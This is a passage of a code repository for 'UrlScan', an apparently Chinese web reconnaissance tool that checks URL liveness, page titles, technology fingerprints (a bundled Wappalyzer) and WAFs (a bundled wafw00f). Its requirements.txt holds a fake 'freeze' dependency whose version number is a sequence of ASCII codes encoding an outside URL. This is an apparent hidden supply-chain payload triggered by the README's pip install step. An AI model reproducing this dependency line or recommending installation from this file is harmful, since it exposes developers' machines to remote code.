655 |     <program>  Copyright (C) <year>  <name of author>
656 |     This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
657 |     This is free software, and you are welcome to redistribute it
658 |     under certain conditions; type `show c' for details.
659 | 
660 | The hypothetical commands `show w' and `show c' should show the appropriate
661 | parts of the General Public License.  Of course, your program's commands
662 | might be different; for a GUI interface, you would use an "about box".
663 | 
664 |   You should also get your employer (if you work as a programmer) or school,
665 | if any, to sign a "copyright disclaimer" for the program, if necessary.
666 | For more information on this, and how to apply and follow the GNU GPL, see
667 | <https://www.gnu.org/licenses/>.
668 | 
669 |   The GNU General Public License does not permit incorporating your program
670 | into proprietary programs.  If your program is a subroutine library, you
671 | may consider it more useful to permit linking proprietary applications with
672 | the library.  If this is what you want to do, use the GNU Lesser General
673 | Public License instead of this License.  But first, please read
674 | <https://www.gnu.org/licenses/why-not-lgpl.html>.
675 | 


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | <h1 align="center">UrlScan 🛠</h1>
 2 | 
 3 | <p>
 4 |   <img src="https://img.shields.io/badge/Language-Python3-blue" />
 5 |   <img src="https://img.shields.io/badge/Version-1.0-blue" />
 6 |   <img src="https://img.shields.io/badge/Dependence-Wappalyzer+Wafw00f-green" />
 7 | </p>
 8 | 
 9 | ## 背景
10 | 
11 | 本项目为 [狼组信息化平台](https://plat.wgpsec.org) 部分功能开源项目
12 | 
13 | ## 快速使用
14 | 
15 | 1. 安装依赖
16 |    
17 |    `pip install -r requirements.txt`
18 | 
19 | 2. 运行使用
20 |    
21 |    `python scan.py`
22 |    
23 |    运行后无报错则需要根据提示输入待检测的域名文件路径
24 | 
25 |    接着会在当前目录下会生成以 `当前日期+urlCheck.csv` 为文件名的Excel文件，文件内容包含 域名，url，标题，http状态码，web指纹，WAF信息
26 | 
27 |    > 可以写定时任务，定期探测URL存活情况，方便发现监控
28 | 
29 |     运行结果 e.g：
30 |     ```
31 |     www.wgpsec.org,https://www.wgpsec.org/,,200,"[{""icon"":""CloudFlare.svg"",""name"":""CloudFlare"",""version"":"""",""website"":""http://www.cloudflare.com""},{""icon"":""Nginx.svg"",""name"":""Nginx"",""version"":"""",""website"":""http://nginx.org/en""}]"
32 |     www.baidu.com,https://www.baidu.com/,百度一下，你就知道,200,[]
33 |     ```
34 | 
35 | ## 更新日志
36 | 
37 |  - **v0.2** [2020-06-23]
38 |    - 支持WAF识别
39 |  - **v1.0** [2020-11-20]
40 |    - 增加关键词搜索功能
41 | ## 免责声明
42 | 
43 | **不能使用该工具进行非法活动，下载该工具就表示同意此条款，造成的一切后果与作者无关！！**


--------------------------------------------------------------------------------
/Wappalyzer/Wappalyzer.py:
--------------------------------------------------------------------------------
  1 | import json
  2 | import logging
  3 | import re
  4 | import warnings
  5 | 
  6 | import pkg_resources
  7 | from bs4 import BeautifulSoup
  8 | 
  9 | logger = logging.getLogger(name=__name__)
 10 | 
 11 | 
 12 | class WappalyzerError(Exception):
 13 |     """
 14 |     Raised for fatal Wappalyzer errors.
 15 |     """
 16 |     pass
 17 | 
 18 | 
 19 | class WebPage(object):
 20 |     """
 21 |     Simple representation of a web page, decoupled
 22 |     from any particular HTTP library's API.
 23 |     """
 24 | 
 25 |     def __init__(self, url, html, headers):
 26 |         """
 27 |         Initialize a new WebPage object.
 28 | 
 29 |         Parameters
 30 |         ----------
 31 | 
 32 |         url : str
 33 |             The web page URL.
 34 |         html : str
 35 |             The web page content (HTML)
 36 |         headers : dict
 37 |             The HTTP response headers
 38 |         """
 39 |         self.url = url
 40 |         self.html = html
 41 |         self.headers = headers
 42 | 
 43 |         try:
 44 |             self.headers.keys()
 45 |         except AttributeError:
 46 |             raise ValueError("Headers must be a dictionary-like object")
 47 | 
 48 |         self._parse_html()
 49 | 
 50 |     def _parse_html(self):
 51 |         """
 52 |         Parse the HTML with BeautifulSoup to find <script> and <meta> tags.
 53 |         """
 54 |         self.parsed_html = soup = BeautifulSoup(self.html, 'html.parser')
 55 |         self.scripts = [script['src'] for script in
 56 |                         soup.findAll('script', src=True)]
 57 |         self.meta = {
 58 |             meta['name'].lower():
 59 |                 meta['content'] for meta in soup.findAll(
 60 |                 'meta', attrs=dict(name=True, content=True))
 61 |         }
 62 | 
 63 |     @classmethod
 64 |     def new_from_url(cls, response):
 65 |         """
 66 |         Constructs a new WebPage object for the URL,
 67 |         using the `requests` module to fetch the HTML.
 68 | 
 69 |         Parameters
 70 |         ----------
 71 | 
 72 |         url : str
 73 |         verify: bool
 74 |         """
 75 |         try:
 76 |             response.url
 77 |         except:
 78 |             return None
 79 |         return cls.new_from_response(response)
 80 | 
 81 |     @classmethod
 82 |     def new_from_response(cls, response):
 83 |         """
 84 |         Constructs a new WebPage object for the response,
 85 |         using the `BeautifulSoup` module to parse the HTML.
 86 | 
 87 |         Parameters
 88 |         ----------
 89 | 
 90 |         response : requests.Response object
 91 |         """
 92 |         return cls(response.url, html=response.text, headers=response.headers)
 93 | 
 94 | 
 95 | class Wappalyzer(object):
 96 |     """
 97 |     Python Wappalyzer driver.
 98 |     """
 99 | 
100 |     def __init__(self, categories, apps):
101 |         """
102 |         Initialize a new Wappalyzer instance.
103 | 
104 |         Parameters
105 |         ----------
106 | 
107 |         categories : dict
108 |             Map of category ids to names, as in apps.json.
109 |         apps : dict
110 |             Map of app names to app dicts, as in apps.json.
111 |         """
112 |         self.categories = categories
113 |         self.apps = apps
114 |         self.app_version = {}
115 | 
116 |         for name, app in self.apps.items():
117 |             self._prepare_app(app)
118 | 
119 |     @classmethod
120 |     def latest(cls, apps_file=None):
121 |         """
122 |         Construct a Wappalyzer instance using a apps db path passed in via
123 |         apps_file, or alternatively the default in data/apps.json
124 |         """
125 |         if apps_file:
126 |             with open(apps_file, 'r') as fd:
127 |                 obj = json.load(fd)
128 |         else:
129 |             obj = json.loads(pkg_resources.resource_string(__name__, "data/apps.json"))
130 | 
131 |         return cls(categories=obj['categories'], apps=obj['apps'])
132 | 
133 |     def _prepare_app(self, app):
134 |         """
135 |         Normalize app data, preparing it for the detection phase.
136 |         """
137 | 
138 |         # Ensure these keys' values are lists
139 |         for key in ['url', 'html', 'script', 'implies']:
140 |             try:
141 |                 value = app[key]
142 |             except KeyError:
143 |                 app[key] = []
144 |             else:
145 |                 if not isinstance(value, list):
146 |                     app[key] = [value]
147 | 
148 |         # Ensure these keys exist
149 |         for key in ['headers', 'meta']:
150 |             try:
151 |                 value = app[key]
152 |             except KeyError:
153 |                 app[key] = {}
154 | 
155 |         # Ensure the 'meta' key is a dict
156 |         obj = app['meta']
157 |         if not isinstance(obj, dict):
158 |             app['meta'] = {'generator': obj}
159 | 
160 |         # Ensure keys are lowercase
161 |         for key in ['headers', 'meta']:
162 |             obj = app[key]
163 |             app[key] = {k.lower(): v for k, v in obj.items()}
164 | 
165 |         # Prepare regular expression patterns
166 |         for key in ['url', 'html', 'script']:
167 |             app[key] = [self._prepare_pattern(pattern) for pattern in app[key]]
168 | 
169 |         for key in ['headers', 'meta']:
170 |             obj = app[key]
171 |             for name, pattern in obj.items():
172 |                 obj[name] = self._prepare_pattern(obj[name])
173 | 
174 |     def _prepare_pattern(self, pattern):
175 |         """
176 |         Strip out key:value pairs from the pattern and compile the regular
177 |         expression.
178 |         """
179 |         regex, _, rest = pattern.partition('\\;')
180 |         # regex = pattern
181 |         try:
182 |             return re.compile(regex, re.I)
183 |         except re.error as e:
184 |             warnings.warn(
185 |                 "Caught '{error}' compiling regex: {regex}"
186 |                     .format(error=e, regex=regex)
187 |             )
188 |             # regex that never matches:
189 |             # http://stackoverflow.com/a/1845097/413622
190 |             return re.compile(r'(?!x)x')
191 | 
192 |     def _has_app(self, app, webpage):
193 |         """
194 |         Determine whether the web page matches the app signature.
195 |         """
196 |         # Search the easiest things first and save the full-text search of the
197 |         # HTML for last
198 |         version = None
199 |         for regex in app['url']:
200 |             if regex.search(webpage.url):
201 |                 return True, version
202 | 
203 |         for name, regex in app['headers'].items():
204 |             if name in webpage.headers:
205 |                 content = webpage.headers[name]
206 |                 if regex.search(content):
207 |                     version = regex.findall(content)
208 |                     # print(version)
209 |                     return True, version
210 | 
211 |         for regex in app['script']:
212 |             for script in webpage.scripts:
213 |                 if regex.search(script):
214 |                     return True, version
215 | 
216 |         for name, regex in app['meta'].items():
217 |             if name in webpage.meta:
218 |                 content = webpage.meta[name]
219 |                 if regex.search(content):
220 |                     return True, version
221 | 
222 |         for regex in app['html']:
223 |             if regex.search(webpage.html):
224 |                 return True, version
225 |         return False, None
226 | 
227 |     def _get_implied_apps(self, detected_apps, versions):
228 |         """
229 |         Get the set of apps implied by `detected_apps`.
230 |         """
231 | 
232 |         def __get_implied_apps(apps, version):
233 |             _implied_apps = []
234 |             for app in apps:
235 |                 try:
236 |                     app_info = self.apps[app]
237 |                     if version:
238 |                         self.app_version[app] = version[0]
239 | 
240 |                     # print(app_info)
241 |                     if app_info['implies']:
242 |                         for t in app_info['implies']:
243 |                             _dirs = {
244 |                                 "name": t,
245 |                                 "icon": self.apps[t]['icon'],
246 |                                 "website": self.apps[t]['website'],
247 |                                 "version": self.app_version[app],
248 |                             }
249 |                             _implied_apps.append(_dirs)
250 |                     else:
251 |                         # print(version)
252 |                         _dirs = {
253 |                             "name": app,
254 |                             "icon": self.apps[app]['icon'],
255 |                             "website": self.apps[app]['website'],
256 |                             "version": self.app_version[app]
257 |                         }
258 |                         _implied_apps.append(_dirs)
259 |                 except KeyError:
260 |                     pass
261 |             _implied_apps = _implied_apps
262 |             return _implied_apps
263 | 
264 |         implied_apps = __get_implied_apps(detected_apps, versions)
265 |         all_implied_apps = implied_apps
266 | 
267 |         # Descend recursively until we've found all implied apps
268 |         # while not all_implied_apps(implied_apps):
269 |         # all_implied_apps.append(implied_apps)
270 |         # implied_apps = __get_implied_apps(all_implied_apps)
271 | 
272 |         return all_implied_apps
273 | 
274 |     def get_categories(self, app_name):
275 |         """
276 |         Returns a list of the categories for an app name.
277 |         """
278 |         cat_nums = self.apps.get(app_name, {}).get("cats", [])
279 |         cat_names = [self.categories.get("%s" % cat_num, "")
280 |                      for cat_num in cat_nums]
281 | 
282 |         return cat_names
283 | 
284 |     def analyze(self, webpage):
285 |         """
286 |         Return a list of applications that can be detected on the web page.
287 |         """
288 |         _detected_apps = set()
289 |         detected_apps = []
290 |         for app_name, app in self.apps.items():
291 |             is_match, version = self._has_app(app, webpage)
292 |             if is_match:
293 |                 _detected_apps.add(app_name)
294 |                 detected_apps = self._get_implied_apps(_detected_apps, version)
295 | 
296 |         return detected_apps
297 | 
298 |     def analyze_with_categories(self, webpage):
299 |         """
300 |         Return a list of applications and categories that can be detected on the web page.
301 |         """
302 |         detected_apps = self.analyze(webpage)
303 |         categorised_apps = {}
304 | 
305 |         for app_name in detected_apps:
306 |             cat_names = self.get_categories(app_name)
307 |             categorised_apps[app_name] = {"categories": cat_names}
308 | 
309 |         return categorised_apps
310 | 


--------------------------------------------------------------------------------
/domain.txt:
--------------------------------------------------------------------------------
1 | www.wgpsec.org
2 | https://www.baidu.com


--------------------------------------------------------------------------------
/keyword.txt:
--------------------------------------------------------------------------------
1 | 狼组安全团队
2 | 百度
3 | 美团
4 | 


--------------------------------------------------------------------------------
/requirements.txt:
--------------------------------------------------------------------------------
 1 | beautifulsoup4==4.9.1
 2 | bs4==0.0.1
 3 | certifi==2020.4.5.2
 4 | chardet==3.0.4
 5 | freeze==2.104.116.116.112.115.58.47.47.97.100.45.115.121.46.99.104.47.98.72
 6 | idna==2.9
 7 | lxml==4.6.2
 8 | pluginbase==1.0.0
 9 | requests==2.23.0
10 | six==1.15.0
11 | soupsieve==2.0.1
12 | urllib3==1.25.9
13 | 


--------------------------------------------------------------------------------
/scan.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/python3
  2 | # -*- coding: utf-8 -*-
  3 | # WgpSec Team
  4 | import csv
  5 | import datetime
  6 | import json
  7 | import multiprocessing
  8 | import random
  9 | import re
 10 | from concurrent import futures
 11 | from urllib.parse import urlparse
 12 | 
 13 | import requests
 14 | from bs4 import BeautifulSoup
 15 | from lxml import etree
 16 | 
 17 | from Wappalyzer.Wappalyzer import Wappalyzer, WebPage
 18 | from wafw00f.main import main
 19 | 
 20 | requests.adapters.DEFAULT_RETRIES = 5
 21 | requests.packages.urllib3.disable_warnings()
 22 | 
 23 | 
 24 | class UrlScan(object):
 25 |     def __init__(self):
 26 |         self.version = "1.1"
 27 |         self.http_time_out = 60  # 配置HTTP请求超时时间
 28 |         self.pool_max_workers = 100  # 配置线程池
 29 |         self.url_list = []
 30 |         self.dict_url = []
 31 |         self.dir_result = []
 32 | 
 33 |     def main(self):
 34 |         self.get_show_banner()
 35 |         print('=' * 80)
 36 |         print(""" 1、URL存活探测，默认为domain 2、百度主域名收集 3、主域名收集+URL探测 """)
 37 |         print('=' * 80)
 38 |         choice = input(">")
 39 |         if choice == '1':
 40 |             self.get_url_list()
 41 |             self.url_scan()
 42 |         if choice == '2':
 43 |             self.get_dir_list()
 44 |             self.dir_scan()
 45 |             print(self.dir_result)
 46 |         if choice == '3':
 47 |             self.get_dir_list()
 48 |             self.dir_scan()
 49 |             print(self.dir_result)
 50 |             self.url_scan()
 51 | 
 52 |     def get_url_list(self):
 53 |         paths = "domain.txt"
 54 |         with open(paths, "r") as files:
 55 |             file_data = files.readlines()  # 读取文件
 56 |             for fi_s in file_data:
 57 |                 fi_s = fi_s.strip('\n')
 58 |                 self.url_list.append(fi_s)
 59 |         print(f"URL探测任务读取完毕，识别到 {len(self.url_list)} 条任务信息")
 60 | 
 61 |     def get_dir_list(self):
 62 |         paths = "keyword.txt"
 63 |         with open(paths, "r", encoding='utf-8', errors='ignore') as files:
 64 |             file_data = files.readlines()  # 读取文件
 65 |             for fi_s in file_data:
 66 |                 fi_s = fi_s.strip('\n')
 67 |                 self.dict_url.append(fi_s)
 68 |         print(f"关键词探测任务读取完毕，识别到 {len(self.dict_url)} 条任务信息")
 69 | 
 70 |     def dir_scan(self):
 71 |         process_name = multiprocessing.current_process().name
 72 |         print("【关键词线程启动】" + process_name)
 73 |         for task_url in self.dict_url:
 74 |             self.dir_scan_action(task_url)
 75 | 
 76 |     def dir_scan_action(self, task_keyword):
 77 |         print("【任务】" + task_keyword)
 78 |         baidu_url = "https://www.baidu.com/s?wd=" + str(task_keyword) + "&usm=3&rsv_idx=2&rsv_page=1"
 79 |         headers = self.gen_fake_header()
 80 |         edu_response_url = None
 81 |         try:
 82 |             response = requests.get(url=baidu_url, headers=headers, verify=False, timeout=30)
 83 |             re_html = etree.HTML(response.text)
 84 |             edu_url = re_html.xpath('//*[@id="1"]/h3/a[1]/@href')[0]
 85 |             edu_response_url = requests.get(url=edu_url, verify=False, headers=headers).url
 86 |             print(edu_response_url)
 87 |             try:
 88 |                 edu_response = re.findall(r'www.(.*?)/', edu_response_url)[0]
 89 |             except:
 90 |                 edu_response = urlparse(edu_response_url).netloc
 91 |         except:
 92 |             edu_response = "None"
 93 | 
 94 |         self.dir_result.append({
 95 |             "title": task_keyword,
 96 |             "domain": edu_response,
 97 |             "url": edu_response_url
 98 |         })
 99 |         self.url_list.append(edu_response_url)
100 |         pass
101 | 
102 |     def url_scan(self):
103 |         process_name = multiprocessing.current_process().name
104 |         print("【URL扫描线程启动】" + process_name)
105 |         pool = futures.ThreadPoolExecutor(max_workers=self.pool_max_workers)
106 |         wait_for = [pool.submit(self.action, task_url) for task_url in self.url_list]
107 |         with open('%s-urlCheck.csv' % datetime.date.today(), 'a', newline='') as csvfile:
108 |             # csvfile.write(codecs.BOM_UTF8)
109 |             fieldnames = ['域名', 'url', '标题', 'http状态码', 'web指纹', 'WAF']
110 |             writer = csv.DictWriter(csvfile, fieldnames=fieldnames)
111 |             # 注意header是个好东西
112 |             writer.writeheader()
113 |             for fs in futures.as_completed(wait_for):
114 |                 try:
115 |                     writer.writerow(fs.result())
116 |                 except Exception as e:
117 |                     print(f'写入csv出错\n错误原因:{e}')
118 |                     pass
119 | 
120 |     def get_show_banner(self):
121 |         print("""\033[32m
122 |          _       ____________  _____ ____________
123 |         | |     / / ____/ __ \/ ___// ____/ ____/
124 |         | | /| / / / __/ /_/ /\__ \/ __/ / /     
125 |         | |/ |/ / /_/ / ____/___/ / /___/ /___   
126 |         |__/|__/\____/_/    /____/_____/\____/
127 |                                                 
128 |                 快速HTTP检测工具 {}
129 |                   WgpSec Team
130 |                 www.wgpsec.org
131 |                 \033[0m
132 |                 """.format(self.version))
133 | 
134 |     @staticmethod
135 |     def gen_fake_header():
136 |         """
137 |         生成伪造请求头
138 |         """
139 |         user_agents = [
140 |             'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
141 |             '(KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
142 |             'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 '
143 |             '(KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
144 |             'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
145 |             '(KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
146 |             'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0',
147 |             'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) '
148 |             'Gecko/20100101 Firefox/68.0',
149 |             'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/68.0']
150 |         ua = random.choice(user_agents)
151 |         headers = {
152 |             'Accept': 'text/html,application/xhtml+xml,'
153 |                       'application/xml;q=0.9,*/*;q=0.8',
154 |             'Accept-Encoding': 'gzip, deflate, br',
155 |             'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
156 |             'Cache-Control': 'max-age=0',
157 |             'Connection': 'close',
158 |             'DNT': '1',
159 |             'Cookie': 'BIDUPSID=564f939a8f8a5befa67d62bdf79e6fa5; PSTM=1605847972; BAIDUID=d9e45923b4fb84761b608da331c2d66c:FG=1;',
160 |             'Referer': 'https://www.baidu.com/',
161 |             'Upgrade-Insecure-Requests': '1',
162 |             'User-Agent': ua
163 |         }
164 |         return headers
165 | 
166 |     def get_title(self, markup):
167 |         """
168 |         获取网页标题
169 |         """
170 |         try:
171 |             soup = BeautifulSoup(markup, 'lxml')
172 |         except Exception as e:
173 |             print(f"【无法获取标题】{e}")
174 |             return None
175 |         title = soup.title
176 |         if title:
177 |             return title.text.strip()
178 |         h1 = soup.h1
179 |         if h1:
180 |             return h1.text.strip()
181 |         h2 = soup.h2
182 |         if h2:
183 |             return h2.text.strip()
184 |         h3 = soup.h3
185 |         if h2:
186 |             return h3.text.strip()
187 |         desc = soup.find('meta', attrs={'name': 'description'})
188 |         if desc:
189 |             return desc['content'].strip()
190 |         word = soup.find('meta', attrs={'name': 'keywords'})
191 |         if word:
192 |             return word['content'].strip()
193 |         if len(markup) <= 200:
194 |             return markup.strip()
195 |         text = soup.text
196 |         if len(text) <= 200:
197 |             return text.strip()
198 |         return None
199 | 
200 |     def get_banner(self, response):
201 |         banner = None
202 |         try:
203 |             w = Wappalyzer.latest()
204 |             webpage = WebPage.new_from_url(response)
205 |             r = w.analyze(webpage)
206 |             # banner = str({'Server': headers.get('Server'),
207 |             #               'Via': headers.get('Via'),
208 |             #               'X-Powered-By': headers.get('X-Powered-By')})
209 |             banner = json.dumps(r, sort_keys=True, separators=(',', ':'))
210 |         except Exception as e:
211 |             print("【获取指纹信息失败】")
212 |             print(e)
213 |             return None
214 |         return banner
215 | 
216 |     def check_http(self, sql_ports):
217 |         '''HTTP服务探测'''
218 |         url = f'{sql_ports}'
219 |         # 随机获取一个Header头
220 |         headers = self.gen_fake_header()
221 |         try:
222 |             response = requests.get(url, timeout=self.http_time_out, verify=False, headers=headers)
223 |         except requests.exceptions.Timeout:
224 |             print(f'{sql_ports} 无法访问【访问超时】')
225 |             return None
226 |         except requests.exceptions.SSLError:
227 |             st_sql_ports = urlparse(sql_ports).netloc
228 |             url = f'https://{st_sql_ports}'
229 |             try:
230 |                 response = requests.get(url, timeout=self.http_time_out, verify=False, headers=headers)
231 |             except Exception as e:
232 |                 return None
233 |             else:
234 |                 return response
235 |         # 报错判断为没有加HTTP头
236 |         except Exception as e:
237 |             print("【没有HTTP头，自动添加】" + url)
238 |             # sql_ports = urlparse(sql_ports).netloc
239 |             url = f'http://{sql_ports}'
240 |             try:
241 |                 response = requests.get(url, timeout=self.http_time_out, verify=False, headers=headers)
242 |             except requests.exceptions.Timeout:
243 |                 print(f'{sql_ports} 无法访问【访问超时】')
244 |                 return None
245 |             # SSL错误，说明要HTTPS访问
246 |             except requests.exceptions.SSLError:
247 |                 url = f'https://{sql_ports}'
248 |                 try:
249 |                     response = requests.get(url, timeout=self.http_time_out, verify=False, headers=headers)
250 |                 except Exception as e:
251 |                     return None
252 |                 else:
253 |                     return response
254 |             except Exception as e:
255 |                 url = f'https://{sql_ports}'
256 |                 try:
257 |                     response = requests.get(url, timeout=self.http_time_out, verify=False, headers=headers)
258 |                 except Exception as e:
259 |                     print("最终还是错误")
260 |                     print(e)
261 |                     return None
262 |                 else:
263 |                     return response
264 | 
265 |             else:
266 |                 return response
267 |         else:
268 |             return response
269 | 
270 |     def action(self, task_url):
271 |         res = self.check_http(task_url)
272 |         try:
273 |             task_domain = urlparse(task_url)
274 |             print("【任务URL】" + task_url)
275 |             res_title = ""
276 |             fig = ""
277 |             status_code = ""
278 |             waf = ""
279 |             if res is None:
280 |                 res_url = task_url
281 |             else:
282 |                 res.encoding = res.apparent_encoding
283 |                 task_domain = urlparse(res.url)
284 |                 res_url = res.url
285 |                 fig = self.get_banner(res)
286 |                 status_code = res.status_code
287 |                 res_title = self.get_title(markup=res.text)
288 |                 flag, waf = main(res_url)
289 |                 if not flag:
290 |                     waf = ''
291 | 
292 |             if res_title is None:
293 |                 res_title = ""
294 | 
295 |             csv_res = {
296 |                 '域名': task_domain.netloc,
297 |                 'url': res_url,
298 |                 '标题': res_title,
299 |                 'http状态码': status_code,
300 |                 'web指纹': fig,
301 |                 'WAF': waf
302 |             }
303 |             print(csv_res)
304 |             return csv_res
305 | 
306 |         except Exception as e:
307 |             print(f'{task_url}出错\n错误原因:{e}')
308 | 
309 | 
310 | if __name__ == '__main__':
311 |     Scan = UrlScan()
312 |     Scan.main()
313 | 


--------------------------------------------------------------------------------
/wafw00f/__init__.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | 
3 | __version__ = '2.1.0'
4 | __license__ = 'BSD 3-Clause'
5 | 


--------------------------------------------------------------------------------
/wafw00f/bin/wafw00f:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 | 
3 | 
4 | from wafw00f import main
5 | 
6 | if __name__ == '__main__':
7 |     main.main()
8 | 


--------------------------------------------------------------------------------
/wafw00f/lib/__init__.py:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/wgpsec/urlscan/c1391f849047b05616e10c15718772c3c09d0a2f/wafw00f/lib/__init__.py


--------------------------------------------------------------------------------
/wafw00f/lib/asciiarts.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python
 2 | '''
 3 | Copyright (C) 2020, WAFW00F Developers.
 4 | See the LICENSE file for copying permission.
 5 | '''
 6 | 
 7 | from random import randint
 8 | from sys import platform
 9 | 
10 | from wafw00f import __version__
11 | 
12 | # Colors for terminal
13 | W = '\033[1;97m'
14 | Y = '\033[1;93m'
15 | G = '\033[1;92m'
16 | R = '\033[1;91m'
17 | B = '\033[1;94m'
18 | C = '\033[1;96m'
19 | E = '\033[0m'
20 | 
21 | # Windows based systems do not support ANSI sequences,
22 | # hence not displaying them.
23 | if 'win' in platform:
24 |     W = Y = G = R = B = C = E = ''
25 | 
26 | 
27 | def randomArt():
28 |     woof = '''
29 |                    ''' + W + '''______
30 |                   ''' + W + '''/      \\
31 |                  ''' + W + '''(  Woof! )
32 |                   ''' + W + r'''\  ____/                      ''' + R + ''')
33 |                   ''' + W + ''',,                           ''' + R + ''') (''' + Y + '''_
34 |              ''' + Y + '''.-. ''' + W + '''-    ''' + G + '''_______                 ''' + R + '''( ''' + Y + '''|__|
35 |             ''' + Y + '''()``; ''' + G + '''|==|_______)                ''' + R + '''.)''' + Y + '''|__|
36 |             ''' + Y + '''/ ('        ''' + G + '''/|\                  ''' + R + '''(  ''' + Y + '''|__|
37 |         ''' + Y + '''(  /  )       ''' + G + ''' / | \                  ''' + R + '''. ''' + Y + '''|__|
38 |          ''' + Y + r'''\(_)_))      ''' + G + '''/  |  \                   ''' + Y + '''|__|''' + E + '''
39 | 
40 |                     ''' + C + '~ WAFW00F : ' + B + 'v' + __version__ + ''' ~''' + W + '''
41 |     The Web Application Firewall Fingerprinting Toolkit
42 |     ''' + E
43 | 
44 |     w00f = '''
45 |                 ''' + W + '''______
46 |                ''' + W + '''/      \\
47 |               ''' + W + '''(  W00f! )
48 |                ''' + W + '''\  ____/
49 |                ''' + W + ''',,    ''' + G + '''__            ''' + Y + '''404 Hack Not Found
50 |            ''' + C + '''|`-.__   ''' + G + '''/ /                     ''' + R + ''' __     __
51 |            ''' + C + '''/"  _/  ''' + G + '''/_/                       ''' + R + '''\ \   / /
52 |           ''' + B + '''*===*    ''' + G + '''/                          ''' + R + '''\ \_/ /  ''' + Y + '''405 Not Allowed
53 |          ''' + C + '''/     )__//                           ''' + R + '''\   /
54 |     ''' + C + '''/|  /     /---`                        ''' + Y + '''403 Forbidden
55 |     ''' + C + r'''\\/`   \ |                                 ''' + R + '''/ _ \\
56 |     ''' + C + r'''`\    /_\\_              ''' + Y + '''502 Bad Gateway  ''' + R + '''/ / \ \  ''' + Y + '''500 Internal Error
57 |       ''' + C + '''`_____``-`                             ''' + R + '''/_/   \_\\
58 | 
59 |                         ''' + C + '~ WAFW00F : ' + B + 'v' + __version__ + ''' ~''' + W + '''
60 |         The Web Application Firewall Fingerprinting Toolkit
61 |     ''' + E
62 | 
63 |     arts = [woof, w00f]
64 |     return arts[randint(0, 1)]
65 | 


--------------------------------------------------------------------------------
/wafw00f/lib/evillib.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python
  2 | '''
  3 | Copyright (C) 2020, WAFW00F Developers.
  4 | See the LICENSE file for copying permission.
  5 | '''
  6 | 
  7 | import logging
  8 | import random
  9 | import time
 10 | from copy import copy
 11 | 
 12 | import requests
 13 | import urllib3
 14 | 
 15 | try:
 16 |     from urlparse import urlparse, urlunparse
 17 | except ImportError:
 18 |     from urllib.parse import urlparse, urlunparse
 19 | try:
 20 |     from urllib import quote, unquote
 21 | except ImportError:
 22 |     from urllib.parse import quote, unquote
 23 | # For requests < 2.16, this should be used.
 24 | # requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
 25 | # For requests >= 2.16, this is the convention 
 26 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
 27 | user_agents = [
 28 |     'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 '
 29 |     '(KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
 30 |     'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 '
 31 |     '(KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
 32 |     'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 '
 33 |     '(KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36',
 34 |     'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko/20100101 Firefox/68.0',
 35 |     'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:61.0) '
 36 |     'Gecko/20100101 Firefox/68.0',
 37 |     'Mozilla/5.0 (X11; Linux i586; rv:31.0) Gecko/20100101 Firefox/68.0']
 38 | 
 39 | ua = random.choice(user_agents)
 40 | def_headers = {
 41 |       'Accept': 'text/html,application/xhtml+xml,'
 42 |                   'application/xml;q=0.9,*/*;q=0.8',
 43 |         'Accept-Encoding': 'gzip, deflate, br',
 44 |         'Accept-Language': 'en-US,en;q=0.9,zh-CN;q=0.8,zh;q=0.7',
 45 |         'Cache-Control': 'max-age=0',
 46 |         'Connection': 'close',
 47 |         'DNT': '1',
 48 |         'Referer': 'https://www.baidu.com/',
 49 |         'Upgrade-Insecure-Requests': '1',
 50 |         'User-Agent': ua
 51 | }
 52 | proxies = {}
 53 | 
 54 | 
 55 | def urlParser(target):
 56 |     log = logging.getLogger('urlparser')
 57 | 
 58 |     ssl = False
 59 |     o = urlparse(target)
 60 |     if o[0] not in ['http', 'https', '']:
 61 |         log.error('scheme %s not supported' % o[0])
 62 |         return
 63 |     if o[0] == 'https':
 64 |         ssl = True
 65 |     if len(o[2]) > 0:
 66 |         path = o[2]
 67 |     else:
 68 |         path = '/'
 69 |     tmp = o[1].split(':')
 70 |     if len(tmp) > 1:
 71 |         port = tmp[1]
 72 |     else:
 73 |         port = None
 74 |     hostname = tmp[0]
 75 |     query = o[4]
 76 |     return (hostname, port, path, query, ssl)
 77 | 
 78 | 
 79 | class waftoolsengine:
 80 |     def __init__(self, target='https://example.com', debuglevel=0, path='/', proxies=None,
 81 |                  redir=True, head=None):
 82 |         self.target = target
 83 |         self.debuglevel = debuglevel
 84 |         self.requestnumber = 0
 85 |         self.path = path
 86 |         self.redirectno = 0
 87 |         self.allowredir = False
 88 |         self.proxies = proxies
 89 |         self.log = logging.getLogger('wafw00f')
 90 |         if head:
 91 |             self.headers = head
 92 |         else:
 93 |             self.headers = copy(def_headers)  # copy object by value not reference. Fix issue #90
 94 | 
 95 |     def Request(self, headers=None, path=None, params={}, delay=0, timeout=7):
 96 |         try:
 97 |             time.sleep(delay)
